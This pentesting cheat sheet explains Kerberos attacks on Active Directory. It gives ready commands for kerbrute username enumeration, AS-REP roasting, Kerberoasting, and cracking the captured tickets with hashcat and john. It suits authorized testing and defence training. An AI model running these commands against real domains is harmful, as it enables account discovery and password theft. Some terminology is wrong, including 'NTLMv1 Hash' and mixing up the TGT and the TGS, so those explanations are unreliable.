PRIMARY CATEGORY → PROTOCOLS AND SERVICES
User Enumeration
Kerbrute
The client sends KRB_AS_REQ (TGT Requests) with no pre-auth
If username does not exist, the KDC responds with a PRINCIPAL UNKNOWN ERROR
If username exists, the KDC prompts for pre-auth, then the client-side closes the connection and we know the user exists
List of Usernames
kerbrute userenum --domain <DOMAIN> --dc <TARGET> <WORDLIST>With a list of existent Domain User Accounts, certain actions can be performed such as →
- AS_REP Roast Attack
- Password Spraying
Check if a username is valid
kerbrute userenum --domain <DOMAIN> --dc <TARGET> <(echo "<USERNAME>")AS_REPRoast
This attacks look for users without Kerberos Pre-Authentication required
Therefore, It is not necessary to know the credentials for these domain user accounts
INFO
Note that, in order to disable Kerberos Pre-Auth for a Domain User Account, the DONT_REQ_PREAUTH flag must be enabled in the User Account Properties
Any client can send an AS_REQ to the KDC’s Authentication Service and receive an AS_REP
This AS_REP contains a chunk of data encrypted with the key derived from the user’s password, i.e. the NTLMv1 Hash
Then, this message can be cracked offline to obtain the User Account’s password
Once cracked, an attacker has valid credentials to be able to authenticate with a Domain User Account and request a TGT
GetNPUsers (Impacket)
This tool is used to harvest the AS_REP Responses, i.e. each chunk of encrypted data with the NTLMv1 hash of the user account
List Users with no Pre-Auth Enabled
LdapSearch
ldapsearch -x -H 'ldap://<TARGET>' -D '<USERNAME>' -w '<PASSWORD>' -b 'DC=<1_SUBDOMAIN>,DC=<TLD>' -s sub '(userAccountControl:1.2.840.113556.1.4.803:=4194304)'AS_REP Capture
To enumerate usernames with kerberos pre-auth not enabled and dump the AS_REP messages, It can be carried out in two ways →
- Specifying a list of existent domain user accounts
GetNPUsers.py -dc-ip <TARGET> <DOMAIN>/ -no-pass -usersfile <FILE> -outputfile <FILE>- Authenticating directly with a valid domain user account
GetNPUsers.py -dc-ip <TARGET> <DOMAIN>/<USERNAME>:<PASSWORD> -outputfile <FILE>These two methods store the AS_REPs’ enc-part as a crackeable format in the specified file
A crackeable enc-part per line should be generated in the specified file
Cracking AS_REP Enc-Part
Once obtained the enc-part of the AS_REPs, just proceed to crack them using hashcat or john
Hashcat
- Long Format
hashcat --hash-type 18200 --attack-mode 0 --force -O --outfile <FILE> <HASH_FILE> <DICTIONARY>- Short Format
hashcat -m 18200 -a 0 --force -O -o <FILE> <HASH_FILE> <DICTIONARY>John
john <HASH_FILE> --wordlist <DICTIONARY> --format=krb5asrepKerberoasting
This attack try to harvest TGS Tickets for services that are being executed by a domain user account
When a client authenticates with a valid domain user account to the KDC’s AS, it receives a TGS cyphered with the NTLMv1 Hash of the KRBTGT domain account
INFO
A NTLMv1 Hash is generated from apply a MD4 digest function to a plain password of a user account, either local or domain
This TGS can be used by the client to submit it to the KDC and generate a TGS (Ticket Granting Service)
First, the client sent the TGT together with the SPN (Service Principal Name) to the KDC’s TGS
INFO
The SPN or Service Principal Name is an unique identifier of an available service in the domains. This service is associated to a Domain Computer or User Account
The TGS checks that the TGT submited is a valid one
If the validation is correct, the Ticket Granting Service procced to issue a TGS related to the mentioned SPN
Before deliver the TGS to the client, this ticket is encrypted using the NTMLv1 Hash of the Domain Computer or User Account related to the service
Therefore, what the Kerberoasting Attack pursues is to get these TGSs and be able to crack them offline to get the user’s accounts passwords
GetUserSPNs.py (Impacket)
This tool is used to perform the following actions →
-
List the Services Principal Names availables in the AD
-
Get all the Tickets Granting Service from the APs
SPN Enumeration
To list all the Services Principal Names and the Domain Computer or User Account that is running those services →
GetUserSPNs
GetUserSPNs.py -dc-ip <TARGET> <DOMAIN>/<USERNAME>:<PASSWORD>LdapSearch
ldapsearch -x -H 'ldap://<TARGET>' -D '<USERNAME>' -w '<PASSWORD>' -b "dc=<1_SUBDOMAIN>,dc=<TLD>" -s sub "(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2))(serviceprincipalname=*/*))" serviceprincipalname | grep -B 1 servicePrincipalNameTGS Capture
To get all the Ticket Granting Services →
Standard Output Displayed
GetUserSPNs.py -dc-ip <TARGET> <DOMAIN>/<USERNAME>:<PASSWORD> -requestStored in a File
GetUserSPNs.py -dc-ip <TARGET> <DOMAIN>/<USERNAME>:<PASSWORD> -outputfile <FILE>A crackeable TGS per line should be generated
TGS Cracking
Hashcat
- Long Format
hashcat --hash-type 13100 --attack-mode 0 --force -0 --outfile <FILE> <HASH_FILE> <DICTIONARY>- Short Format
hashcat -m 13100 -a 0 --force -O -o <FILE> <HASH_FILE> <DICTIONARY>John
john <HASH_FILE> --wordlist <DICTIONARY> --format=krb5tgsMiscellaneous
Disable Insecure Symmetric Encryption Algorithms
Kerberos can encrypt the issued tickets using one of the following algorithms →
- DES
- RC4
- AES128_HMAC_SHA1
- AES256_HMAC_SHA1
Some of the above algorithms are no longer considered secure such as DES and RC4
Thus, pentesting tools usually request TGTs or TGSs with one of these two algorithm as ticket encryption algorithm, to ease the cracking process
To ensure that the AS and the TGS issue tickets with a solid cypher, proceed as indicated here